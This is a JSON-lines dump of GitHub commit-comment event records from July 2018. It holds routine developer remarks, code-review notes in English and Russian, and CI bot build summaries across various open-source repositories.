{"id":"8007449015","type":"CommitCommentEvent","actor":{"login":"melalj"},"repo":{"name":"melalj/topojson-map-generator"},"payload":{"comment":{"id":29808214,"position":65,"line":119,"path":"generate.sh","commit_id":"334c8732570db6dc146d1d014f11a68d4b6214a4","created_at":"2018-07-24T02:31:37Z","updated_at":"2018-07-24T02:31:37Z","author_association":"OWNER","body":"Fixed on https://github.com/melalj/topojson-map-generator/commit/eb519d50b46f0f8467f1f7ced0c4193e51c7ddaf"}},"created_at":"2018-07-24T02:31:37Z"}
{"id":"8007450325","type":"CommitCommentEvent","actor":{"login":"ubcbot"},"repo":{"name":"classytest/PostTestDoNotDelete"},"payload":{"comment":{"id":29808216,"position":null,"line":null,"path":null,"commit_id":"c35a0e5968338a9757813b58368f36ddd64b063e","created_at":"2018-07-24T02:32:08Z","updated_at":"2018-07-24T02:32:08Z","author_association":"NONE","body":"Automated Test Suite Message"}},"created_at":"2018-07-24T02:32:08Z"}
{"id":"8007456544","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29808229,"position":80,"line":588,"path":"epic_bf_dev/EPIC_bifrost.py","commit_id":"e7252a0697a584f1c8795371b636a21d2afc15d9","created_at":"2018-07-24T02:34:32Z","updated_at":"2018-07-24T02:34:32Z","author_association":"COLLABORATOR","body":"I think it was trying to raise it to a power, although in hindsight this is probably because I tried to use a normal pow funciton versus a complex one.\r\n\r\nWhich raises another question I had, I can't seem to use any complex specific functions in C++? The main reason I cast like this is because I try using conj or conjf and the JIT compiler crashes saying it can't find those functions. An oversight in the includes in the bifrost sources somewhere, or a good reason?"}},"created_at":"2018-07-24T02:34:32Z"}
{"id":"8007459768","type":"CommitCommentEvent","actor":{"login":"kageiit"},"repo":{"name":"facebook/buck"},"payload":{"comment":{"id":29808230,"position":null,"line":null,"path":null,"commit_id":"80ae8c35d9d9a19dee1367e7ed90f54c5a4ecae9","created_at":"2018-07-24T02:35:42Z","updated_at":"2018-07-24T02:35:42Z","author_association":"CONTRIBUTOR","body":"This warning event is very noisy. Can we downgrade the level further?\r\n\r\ncc @asp2insp @styurin "}},"created_at":"2018-07-24T02:35:42Z"}
{"id":"8007462452","type":"CommitCommentEvent","actor":{"login":"edhana"},"repo":{"name":"zendesk/twitter"},"payload":{"comment":{"id":29808232,"position":null,"line":null,"path":null,"commit_id":"56614544fa15477b11ef3944e8191bb8f0c12f97","created_at":"2018-07-24T02:36:39Z","updated_at":"2018-07-24T02:36:39Z","author_association":"NONE","body":"👍 "}},"created_at":"2018-07-24T02:36:39Z"}
{"id":"8007463124","type":"CommitCommentEvent","actor":{"login":"mrbeezwax"},"repo":{"name":"mrbeezwax/JermoBot"},"payload":{"comment":{"id":29808233,"position":null,"line":null,"path":null,"commit_id":"fd9927f90cc5255c6dfc25536f78ab2f9d8d6e26","created_at":"2018-07-24T02:36:53Z","updated_at":"2018-07-24T02:36:53Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Daily Check-In](https://trello.com/c/kFubNvb9/22-daily-check-in)"}},"created_at":"2018-07-24T02:36:53Z"}
{"id":"8007467993","type":"CommitCommentEvent","actor":{"login":"tomtomjerry"},"repo":{"name":"pouchcontainer/blog"},"payload":{"comment":{"id":29808238,"position":null,"line":null,"path":null,"commit_id":"eb0a4b781906dbe74bbe20db4159d74797e6ecb7","created_at":"2018-07-24T02:38:40Z","updated_at":"2018-07-24T02:38:40Z","author_association":"NONE","body":"Update PouchContainer Environment Setup Tutorial.md"}},"created_at":"2018-07-24T02:38:40Z"}
{"id":"8007468144","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29808239,"position":null,"line":null,"path":null,"commit_id":"1c8880e7e83a194ce61be5b8fae18a436d2396c0","created_at":"2018-07-24T02:38:43Z","updated_at":"2018-07-24T02:38:43Z","author_association":"OWNER","body":"Created multidev environment [dgreat#ci-998](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#ci-998).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-998-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-24T02:38:43Z"}
{"id":"8007472026","type":"CommitCommentEvent","actor":{"login":"BananaJavaCoder"},"repo":{"name":"BananaJavaCoder/test"},"payload":{"comment":{"id":29808242,"position":2,"line":2,"path":"php1.php","commit_id":"ae3b9842f5477e4c8718f6f717e4771fe5732dd5","created_at":"2018-07-24T02:40:03Z","updated_at":"2018-07-24T02:40:03Z","author_association":"OWNER","body":"1"}},"created_at":"2018-07-24T02:40:03Z"}
{"id":"8007475464","type":"CommitCommentEvent","actor":{"login":"jaycedowell"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29808250,"position":80,"line":588,"path":"epic_bf_dev/EPIC_bifrost.py","commit_id":"e7252a0697a584f1c8795371b636a21d2afc15d9","created_at":"2018-07-24T02:41:16Z","updated_at":"2018-07-24T02:41:16Z","author_association":"COLLABORATOR","body":"bifrost has its own collection of custom complex types in order to extend the complex representation into integers.  The are sorta kinda like standard complex numbers in C++ but more limited in how you can interact with them.  If you look at [Complex.hpp in bifrost](https://github.com/ledatelescope/bifrost/blob/master/src/Complex.hpp) you can see all of the methods/operators that are implemented for them.  This includes a `conj()` method which should work in a call to `bifrost.map()`."}},"created_at":"2018-07-24T02:41:16Z"}
{"id":"8007475555","type":"CommitCommentEvent","actor":{"login":"bwowk"},"repo":{"name":"Minhacps/votasp-app"},"payload":{"comment":{"id":29808251,"position":null,"line":null,"path":null,"commit_id":"b12f5b1a36fcc49abe0777e019a0c98eb63d4aa8","created_at":"2018-07-24T02:41:17Z","updated_at":"2018-07-24T02:41:17Z","author_association":"CONTRIBUTOR","body":"Comma nazi"}},"created_at":"2018-07-24T02:41:17Z"}
{"id":"8007480877","type":"CommitCommentEvent","actor":{"login":"tuanpmpd01037"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29808258,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T02:42:49Z","updated_at":"2018-07-24T02:42:49Z","author_association":"NONE","body":"good"}},"created_at":"2018-07-24T02:42:49Z"}
{"id":"8007488318","type":"CommitCommentEvent","actor":{"login":"angelokim"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29808272,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T02:45:29Z","updated_at":"2018-07-24T02:45:29Z","author_association":"NONE","body":"great and love this"}},"created_at":"2018-07-24T02:45:29Z"}
{"id":"8007489665","type":"CommitCommentEvent","actor":{"login":"wavesheep"},"repo":{"name":"wavesheep/GoogleADK"},"payload":{"comment":{"id":29808277,"position":null,"line":null,"path":null,"commit_id":"e4c8bab51fb2825497bece16fabf31b85907ee3c","created_at":"2018-07-24T02:45:59Z","updated_at":"2018-07-24T02:45:59Z","author_association":"OWNER","body":"提交信息输入有误，api的缓存机制增加提交在此"}},"created_at":"2018-07-24T02:45:59Z"}
{"id":"8007493813","type":"CommitCommentEvent","actor":{"login":"storm119"},"repo":{"name":"storm119/android_frameworks_base"},"payload":{"comment":{"id":29808283,"position":null,"line":null,"path":null,"commit_id":"fbdc8deeeff133351711568ea058bc63ea319980","created_at":"2018-07-24T02:47:30Z","updated_at":"2018-07-24T02:47:30Z","author_association":"OWNER","body":"I'm very sorry to both of you @Mazda-- and @varund7726 ...my promise I won't let this thing happen again in future...just to let you know...this repo meant to be as my private build and didn't expect anyone will cherry picking what I did...\r\n\r\nMy apologise...\r\n\r\nPs...hmm no wonder why I didn't notice the comments...since this commit got updated (commit --amend) and replaced  by this https://github.com/storm119/android_frameworks_base/commit/d76192cc5eb2c554301d8a06920cc919e196770a ...again my bad :("}},"created_at":"2018-07-24T02:47:30Z"}
{"id":"8007500970","type":"CommitCommentEvent","actor":{"login":"ajitpatil23"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29808296,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T02:50:11Z","updated_at":"2018-07-24T02:50:11Z","author_association":"NONE","body":"Look interesting project.  Wan to know more about how it gonna be function."}},"created_at":"2018-07-24T02:50:11Z"}
{"id":"8007509636","type":"CommitCommentEvent","actor":{"login":"thetabloom"},"repo":{"name":"thetabloom/static-comp-2"},"payload":{"comment":{"id":29808311,"position":null,"line":null,"path":null,"commit_id":"c8826e4fe3a9367363d3357c366bea70f069b8a8","created_at":"2018-07-24T02:53:21Z","updated_at":"2018-07-24T02:53:21Z","author_association":"OWNER","body":"final!"}},"created_at":"2018-07-24T02:53:21Z"}
{"id":"8007511003","type":"CommitCommentEvent","actor":{"login":"f1vefour"},"repo":{"name":"Owersun/linux-hardkernel"},"payload":{"comment":{"id":29808314,"position":null,"line":null,"path":null,"commit_id":"0925a367c842f7f5599fa528e05379bb1d7bbff9","created_at":"2018-07-24T02:53:50Z","updated_at":"2018-07-24T02:53:50Z","author_association":"NONE","body":"I can no longer compile after this change, it fails on make dtb."}},"created_at":"2018-07-24T02:53:50Z"}
{"id":"8007514650","type":"CommitCommentEvent","actor":{"login":"KentJames"},"repo":{"name":"nithyanandan/EPIC"},"payload":{"comment":{"id":29808318,"position":80,"line":588,"path":"epic_bf_dev/EPIC_bifrost.py","commit_id":"e7252a0697a584f1c8795371b636a21d2afc15d9","created_at":"2018-07-24T02:55:03Z","updated_at":"2018-07-24T02:55:03Z","author_association":"COLLABORATOR","body":"That explains an awful lot. I wish this was documented somewhere...\n\nDo I need to prepend it with a namespace? Using just conj won’t work from what I’m seeing.\n\n\n> On 23 Jul 2018, at 20:41, jaycedowell <notifications@github.com> wrote:\n> \n> bifrost has its own collection of custom complex types in order to extend the complex representation into integers. The are sorta kinda like standard complex numbers in C++ but more limited in how you can interact with them. If you look at Complex.hpp in bifrost <https://github.com/ledatelescope/bifrost/blob/master/src/Complex.hpp> you can see all of the methods/operators that are implemented for them. This includes a conj() method which should work in a call to bifrost.map().\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/nithyanandan/EPIC/commit/e7252a0697a584f1c8795371b636a21d2afc15d9#commitcomment-29808250>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AB73hJ0Yc2AloA69AKiSuoSCHIRp50Bxks5uJolOgaJpZM4VbS_s>.\n> \n\n"}},"created_at":"2018-07-24T02:55:03Z"}
{"id":"8007524297","type":"CommitCommentEvent","actor":{"login":"Ths2-9Y-LqJt6"},"repo":{"name":"melalj/topojson-map-generator"},"payload":{"comment":{"id":29808328,"position":5,"line":119,"path":"generate.sh","commit_id":"eb519d50b46f0f8467f1f7ced0c4193e51c7ddaf","created_at":"2018-07-24T02:58:31Z","updated_at":"2018-07-24T02:58:31Z","author_association":"NONE","body":"thanks @melalj  - i just tested this and works as expected.  You also fixed ``CONTINENT`` -> ``continent``, thanks!"}},"created_at":"2018-07-24T02:58:31Z"}
{"id":"8007524782","type":"CommitCommentEvent","actor":{"login":"amrendragiri"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29808329,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T02:58:40Z","updated_at":"2018-07-24T02:58:40Z","author_association":"NONE","body":"great"}},"created_at":"2018-07-24T02:58:40Z"}
{"id":"8007525442","type":"CommitCommentEvent","actor":{"login":"ppoffice"},"repo":{"name":"ppoffice/hexo-theme-minos"},"payload":{"comment":{"id":29808330,"position":null,"line":null,"path":null,"commit_id":"76312d45fd89033747ba14d13a48541996434cde","created_at":"2018-07-24T02:58:56Z","updated_at":"2018-07-24T02:58:56Z","author_association":"OWNER","body":"#44 "}},"created_at":"2018-07-24T02:58:56Z"}
{"id":"8012439981","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29819272,"position":33,"line":33,"path":"listen1/calculate_quadratic_equation.rb","commit_id":"a871f0dade63fab50a4d7e6475a52cebbffb35c3","created_at":"2018-07-24T20:00:45Z","updated_at":"2018-07-24T20:00:45Z","author_association":"NONE","body":"лучше вычисление корня квадратного вынести из методов вычисления корней\r\nесли корень квадратный посчитать заранее, то его можно передавать в формулы вычисления корней и получится, что он будет посчитан только один раз\r\nа в текущем варианте он считается дважды, что не очень оптимально"}},"created_at":"2018-07-24T20:00:45Z"}
{"id":"8012440867","type":"CommitCommentEvent","actor":{"login":"janosvitok"},"repo":{"name":"mcallegari/qlcplus"},"payload":{"comment":{"id":29819273,"position":null,"line":null,"path":null,"commit_id":"252578b93bf0bfc51cf61a515759fa1dd269ee13","created_at":"2018-07-24T20:00:55Z","updated_at":"2018-07-24T20:00:55Z","author_association":"CONTRIBUTOR","body":"GLP Volkslicht channel 5 (color wheel) has precedence over RGB. I.e. CH5 < 7 => use RGB. CH5 >= 8 - predefined colors regardless of RGB setting. https://github.com/mcallegari/qlcplus/blob/master/resources/fixtures/GLP/GLP-Volkslicht.qxf#L18\r\n\r\nI suspect that fixtures with subtractive models (CMY wheels + color wheels) do not work this way either.\r\n"}},"created_at":"2018-07-24T20:00:55Z"}
{"id":"8012442528","type":"CommitCommentEvent","actor":{"login":"willismonroe"},"repo":{"name":"adeloucas/cltk"},"payload":{"comment":{"id":29819275,"position":null,"line":null,"path":null,"commit_id":"db621d1cce2b481b5d581a05b0b7bceb2b55ac52","created_at":"2018-07-24T20:01:17Z","updated_at":"2018-07-24T20:01:17Z","author_association":"NONE","body":"Can you add an example to the documentation of a workflow model:\r\n1. ingesting corpus file\r\n2. displaying ToC\r\n3. selecting text\r\n4. converting text to Unicode\r\n(5.) pretty printing resulting text"}},"created_at":"2018-07-24T20:01:17Z"}
{"id":"8012442923","type":"CommitCommentEvent","actor":{"login":"matricks"},"repo":{"name":"matricks/bam"},"payload":{"comment":{"id":29819278,"position":null,"line":null,"path":null,"commit_id":"c192a6d1900b7cdcbf521b524548db11c4c25818","created_at":"2018-07-24T20:01:22Z","updated_at":"2018-07-24T20:01:22Z","author_association":"OWNER","body":"Jobs that doesn't produce anything is a bit weird in general. To me, it feels like the valgrind job output should be a report that you can read afterwards. Or each unit-test can touch a file if they ran successfully."}},"created_at":"2018-07-24T20:01:22Z"}
{"id":"8012455064","type":"CommitCommentEvent","actor":{"login":"navsuda"},"repo":{"name":"ARM-software/ML-KWS-for-MCU"},"payload":{"comment":{"id":29819311,"position":null,"line":null,"path":null,"commit_id":"b9ed13fc45976477743a16409a9567de0507330b","created_at":"2018-07-24T20:03:50Z","updated_at":"2018-07-24T20:03:50Z","author_association":"COLLABORATOR","body":"@pooyaww,\r\nThat function is now a part of CMSIS_5. Just a git pull in CMSIS_5 should fix it for you. "}},"created_at":"2018-07-24T20:03:50Z"}
{"id":"8012457716","type":"CommitCommentEvent","actor":{"login":"k3yavi"},"repo":{"name":"10XGenomics/rust-boomphf"},"payload":{"comment":{"id":29819315,"position":213,"line":515,"path":"src/lib.rs","commit_id":"21f76369347f3b36bca48f559f8f94e735205d75","created_at":"2018-07-24T20:04:22Z","updated_at":"2018-07-24T20:04:22Z","author_association":"COLLABORATOR","body":"Oh Nice, I wasn't aware `ExactSizeIterator` is from rust itself. but the problem still remains since `len` is a function of `NodeKmerIter` while node above is `NodeKmer`. I might have to move `ExactSizeIterator` as a trait for `<N as IntoIterator>::IntoIter` instead of N."}},"created_at":"2018-07-24T20:04:22Z"}
{"id":"8012458279","type":"CommitCommentEvent","actor":{"login":"wenkokke"},"repo":{"name":"agda/agda-stdlib"},"payload":{"comment":{"id":29819316,"position":null,"line":null,"path":null,"commit_id":"3fa7e0f06dba3af2c726f8742a9a50a07341f402","created_at":"2018-07-24T20:04:29Z","updated_at":"2018-07-24T20:04:29Z","author_association":"NONE","body":"> This seems like an awfully specific case but then again the two functions in question are\r\nnot that important so I don't see any issue moving them to another module if that is more\r\nconvenient for you.\r\n\r\nThat would be wonderful 👍 \r\n\r\n> `Level` renames some of the definitions it re-exports so we would have to add these renaming\r\neverywhere. I do not think it is a reasonable solution.\r\n\r\nYou're right, didn't think about that.\r\n\r\n> Are you using any other module that should not depend upon Agda.Builtin.Nat?\r\n\r\nNot sure, but probably, and `Relation.Binary.PropositionalEquality` is a rather important module."}},"created_at":"2018-07-24T20:04:29Z"}
{"id":"8012459990","type":"CommitCommentEvent","actor":{"login":"MichaelDimmitt"},"repo":{"name":"MichaelDimmitt/spacediffs-for-apple-natgeo-images-"},"payload":{"comment":{"id":29819321,"position":65,"line":65,"path":"remove-some-ending-characters","commit_id":"a355daa108ed650dac47ff274ab65a77a51578de","created_at":"2018-07-24T20:04:48Z","updated_at":"2018-07-24T20:04:48Z","author_association":"OWNER","body":"above is a polar bear swimming under water."}},"created_at":"2018-07-24T20:04:48Z"}
{"id":"8012461546","type":"CommitCommentEvent","actor":{"login":"panpawn"},"repo":{"name":"Zarel/Pokemon-Showdown"},"payload":{"comment":{"id":29819328,"position":4,"line":615,"path":"users.js","commit_id":"39606a179b6ae5dc9c8bbc7bb0858fe94f1b051c","created_at":"2018-07-24T20:05:07Z","updated_at":"2018-07-24T20:05:07Z","author_association":"CONTRIBUTOR","body":"Wouldn't it make more sense to change ``room#getAuth``?"}},"created_at":"2018-07-24T20:05:07Z"}
{"id":"8012462907","type":"CommitCommentEvent","actor":{"login":"jkuebart"},"repo":{"name":"mqnc/c-sick"},"payload":{"comment":{"id":29819332,"position":28,"line":67,"path":"src/main.cpp","commit_id":"b773d663d3f95604790885cb691b2c603685fb3b","created_at":"2018-07-24T20:05:22Z","updated_at":"2018-07-24T20:05:22Z","author_association":"COLLABORATOR","body":"It would be better to use `cerr`"}},"created_at":"2018-07-24T20:05:22Z"}
{"id":"8012464126","type":"CommitCommentEvent","actor":{"login":"jkuebart"},"repo":{"name":"mqnc/c-sick"},"payload":{"comment":{"id":29819334,"position":36,"line":75,"path":"src/main.cpp","commit_id":"b773d663d3f95604790885cb691b2c603685fb3b","created_at":"2018-07-24T20:05:36Z","updated_at":"2018-07-24T20:05:36Z","author_association":"COLLABORATOR","body":"it would be better to use `cerr`"}},"created_at":"2018-07-24T20:05:36Z"}
{"id":"8012468526","type":"CommitCommentEvent","actor":{"login":"vukrado"},"repo":{"name":"LambdaSchool/Lambda-Hello"},"payload":{"comment":{"id":29819343,"position":null,"line":null,"path":null,"commit_id":"f359b62bd37c3f5837e25995ddd10dcc9601d88b","created_at":"2018-07-24T20:06:30Z","updated_at":"2018-07-24T20:06:30Z","author_association":"NONE","body":"@armadsen Core Hello Challenge"}},"created_at":"2018-07-24T20:06:30Z"}
{"id":"8012469250","type":"CommitCommentEvent","actor":{"login":"jkuebart"},"repo":{"name":"mqnc/c-sick"},"payload":{"comment":{"id":29819346,"position":36,"line":75,"path":"src/main.cpp","commit_id":"b773d663d3f95604790885cb691b2c603685fb3b","created_at":"2018-07-24T20:06:39Z","updated_at":"2018-07-24T20:06:39Z","author_association":"COLLABORATOR","body":"a more detailed error massage would be nice :-)"}},"created_at":"2018-07-24T20:06:39Z"}
{"id":"8012471137","type":"CommitCommentEvent","actor":{"login":"rfcjoujou"},"repo":{"name":"rfcjoujou/arrazo"},"payload":{"comment":{"id":29819353,"position":null,"line":null,"path":null,"commit_id":"ee87fdddc16603fa9719cfaa26006228993eeba2","created_at":"2018-07-24T20:07:03Z","updated_at":"2018-07-24T20:07:03Z","author_association":"OWNER","body":"Ajustando"}},"created_at":"2018-07-24T20:07:03Z"}
{"id":"8012474471","type":"CommitCommentEvent","actor":{"login":"juliangarciaga3"},"repo":{"name":"juliangarciaga3/SearchPro"},"payload":{"comment":{"id":29819361,"position":null,"line":null,"path":null,"commit_id":"d73f6b4c31a88a0771a62d2c383ac48924164280","created_at":"2018-07-24T20:07:45Z","updated_at":"2018-07-24T20:07:45Z","author_association":"OWNER","body":"xcxcxc"}},"created_at":"2018-07-24T20:07:45Z"}
{"id":"8012475256","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29819362,"position":25,"line":25,"path":"listen1/check_is_right_triangle.rb","commit_id":"a871f0dade63fab50a4d7e6475a52cebbffb35c3","created_at":"2018-07-24T20:07:54Z","updated_at":"2018-07-24T20:07:54Z","author_association":"NONE","body":"по сути в ТЗ явно оговорены 3 случая:\r\n- \"...является ли треугольник прямоугольным...\"\r\n- \"Также, если треугольник является при этом равнобедренным...\"\r\n- \"Если все 3 стороны равны, то треугольник... равносторонний, но не прямоугольный.\"\r\n\r\nможно еще добавить 4-ый вариант: \"не прямоугольный и не равносторонний\"\r\n\r\n(5-м вариантом, если очень хочется, можно проверитть может ли он вообще существовать с заданными длинами сторон)\r\n\r\nполучается в этом решении не хватает \"равностороннего\" треугольника\r\n"}},"created_at":"2018-07-24T20:07:54Z"}
{"id":"8012476329","type":"CommitCommentEvent","actor":{"login":"xiaozdezhu"},"repo":{"name":"NYU-ITP/311APP"},"payload":{"comment":{"id":29819366,"position":null,"line":null,"path":null,"commit_id":"6bf7212b19d38bf446935659222c1349a669298d","created_at":"2018-07-24T20:08:09Z","updated_at":"2018-07-24T20:08:09Z","author_association":"CONTRIBUTOR","body":"- fix bug when post a new issue\r\n- fix bug when click on marker to show issueDetail\r\n- fix bug of downvote and upvote\r\n- delete unnecessary comments\r\n- redirect when data is returned"}},"created_at":"2018-07-24T20:08:09Z"}
{"id":"8012480413","type":"CommitCommentEvent","actor":{"login":"Snuupy"},"repo":{"name":"brave/brave-extension"},"payload":{"comment":{"id":29819372,"position":5,"line":7,"path":"app/types/global/chrome.d.ts","commit_id":"991d03bb6bd96239ad4c205e028d2e2801f0a3a0","created_at":"2018-07-24T20:08:58Z","updated_at":"2018-07-24T20:08:58Z","author_association":"CONTRIBUTOR","body":"any reason to do this instead of this:\r\n```typescript\r\nimport { BlockTypes} from '../../../app/types/other/blockTypes'\r\n```"}},"created_at":"2018-07-24T20:08:58Z"}
{"id":"8012481111","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"night1ightning/ruby_course"},"payload":{"comment":{"id":29819376,"position":25,"line":25,"path":"listen1/check_is_right_triangle.rb","commit_id":"a871f0dade63fab50a4d7e6475a52cebbffb35c3","created_at":"2018-07-24T20:09:07Z","updated_at":"2018-07-24T20:09:07Z","author_association":"NONE","body":"еще одно пожелание - попробовать избавиться от вложенного условия\r\nздесь это сделать несложно и это рекомендуемая стратегия - минимизировать количество вложений "}},"created_at":"2018-07-24T20:09:07Z"}
{"id":"8012481200","type":"CommitCommentEvent","actor":{"login":"Jamie-BitFlight"},"repo":{"name":"stackfeed/terraform-null-label"},"payload":{"comment":{"id":29819377,"position":null,"line":null,"path":null,"commit_id":"4d7fb86ab793edb4664ab7bef422fc80b84bfcd0","created_at":"2018-07-24T20:09:08Z","updated_at":"2018-07-24T20:09:08Z","author_association":"NONE","body":"I can add this, or you can push it?"}},"created_at":"2018-07-24T20:09:08Z"}
{"id":"8012483344","type":"CommitCommentEvent","actor":{"login":"oXL0C0Xo"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":29819384,"position":null,"line":null,"path":null,"commit_id":"c031167e067dd0903c6fa4db4ea88cd5279039d2","created_at":"2018-07-24T20:09:34Z","updated_at":"2018-07-24T20:09:34Z","author_association":"NONE","body":"Thanks!"}},"created_at":"2018-07-24T20:09:34Z"}
{"id":"8012487936","type":"CommitCommentEvent","actor":{"login":"balta2ar"},"repo":{"name":"ncm2/ncm2-pyclang"},"payload":{"comment":{"id":29819394,"position":null,"line":null,"path":null,"commit_id":"d981cdcdc5eab675806a61579ff29f9e69fdf5e1","created_at":"2018-07-24T20:10:30Z","updated_at":"2018-07-24T20:10:30Z","author_association":"NONE","body":"@roxma By the way, `ncm2_pyclang#clang_path` is not mentioned in the README. Should it be?"}},"created_at":"2018-07-24T20:10:30Z"}
{"id":"8012496766","type":"CommitCommentEvent","actor":{"login":"dennybaa"},"repo":{"name":"stackfeed/terraform-null-label"},"payload":{"comment":{"id":29819420,"position":null,"line":null,"path":null,"commit_id":"4d7fb86ab793edb4664ab7bef422fc80b84bfcd0","created_at":"2018-07-24T20:12:17Z","updated_at":"2018-07-24T20:12:17Z","author_association":"NONE","body":"np, i can't push, but I've opened a PR into add-context #31 "}},"created_at":"2018-07-24T20:12:17Z"}
{"id":"8012504006","type":"CommitCommentEvent","actor":{"login":"pmarks"},"repo":{"name":"10XGenomics/rust-boomphf"},"payload":{"comment":{"id":29819433,"position":213,"line":515,"path":"src/lib.rs","commit_id":"21f76369347f3b36bca48f559f8f94e735205d75","created_at":"2018-07-24T20:13:41Z","updated_at":"2018-07-24T20:13:41Z","author_association":"CONTRIBUTOR","body":"len() is a method of ExactSizeIterator, so given the new type constraints,\nthat's the method you're running. ExactSizeIterator::len() has a default\nimplementation which is based on the size_hint() method of the Iterator\n(which in this case is a NodeKmerIter).  I think N: ExactSizeIterator is\nall we need.\n\nOn Tue, Jul 24, 2018 at 1:04 PM Avi Srivastava <notifications@github.com>\nwrote:\n\n> Oh Nice, I wasn't aware ExactSizeIterator is from rust itself. but the\n> problem still remains since len is a function of NodeKmerIter while node\n> above is NodeKmer. I might have to move ExactSizeIterator as a trait for <N\n> as IntoIterator>::IntoIter instead of N.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/10XGenomics/rust-boomphf/commit/21f76369347f3b36bca48f559f8f94e735205d75#commitcomment-29819315>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AACzA0GMxdsjkH8z4bz7LPNxEffGJtHxks5uJ33GgaJpZM4VcINo>\n> .\n>\n"}},"created_at":"2018-07-24T20:13:41Z"}
{"id":"8012504063","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29819434,"position":null,"line":null,"path":null,"commit_id":"eabd4d59642a647988802228e7d48fbbeb5cdb29","created_at":"2018-07-24T20:13:42Z","updated_at":"2018-07-24T20:13:42Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (rraustad) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2980 of 2984 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: ERR diffs.\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 627\n * Failed: 1\n\nregression Test Summary\n * Passed: 640\n * Failed: 3\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eabd4d59642a647988802228e7d48fbbeb5cdb29-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-eabd4d59642a647988802228e7d48fbbeb5cdb29-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.png)</a> \n"}},"created_at":"2018-07-24T20:13:42Z"}
{"id":"8012508723","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29819445,"position":null,"line":null,"path":null,"commit_id":"f6cb4005166658a6f1113a662ee05e23b69601bd","created_at":"2018-07-24T20:14:35Z","updated_at":"2018-07-24T20:14:35Z","author_association":"COLLABORATOR","body":"<h3>[Checkbox] indicator is inline element (#2716)</h3>\n\nPreview: <strong><a href='https://19031-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://19031-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://19031-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-24T20:14:35Z"}
{"id":"8012510663","type":"CommitCommentEvent","actor":{"login":"shashank-kumar"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29819448,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T20:14:58Z","updated_at":"2018-07-24T20:14:58Z","author_association":"NONE","body":"solidity code seems to be well written"}},"created_at":"2018-07-24T20:14:58Z"}
{"id":"8012513372","type":"CommitCommentEvent","actor":{"login":"seema84"},"repo":{"name":"sk89q/WorldGuard"},"payload":{"comment":{"id":29819455,"position":null,"line":null,"path":null,"commit_id":"173a9a320de50d374d64b6485ab799be58277d25","created_at":"2018-07-24T20:15:28Z","updated_at":"2018-07-24T20:15:28Z","author_association":"NONE","body":"thanks"}},"created_at":"2018-07-24T20:15:28Z"}
{"id":"8012515810","type":"CommitCommentEvent","actor":{"login":"MahmoudHreitani"},"repo":{"name":"iride2020/iRide-Token"},"payload":{"comment":{"id":29819459,"position":null,"line":null,"path":null,"commit_id":"8f810b3700a24de0ee4f945ef84be7b2f1605610","created_at":"2018-07-24T20:15:56Z","updated_at":"2018-07-24T20:15:56Z","author_association":"NONE","body":"good project"}},"created_at":"2018-07-24T20:15:56Z"}
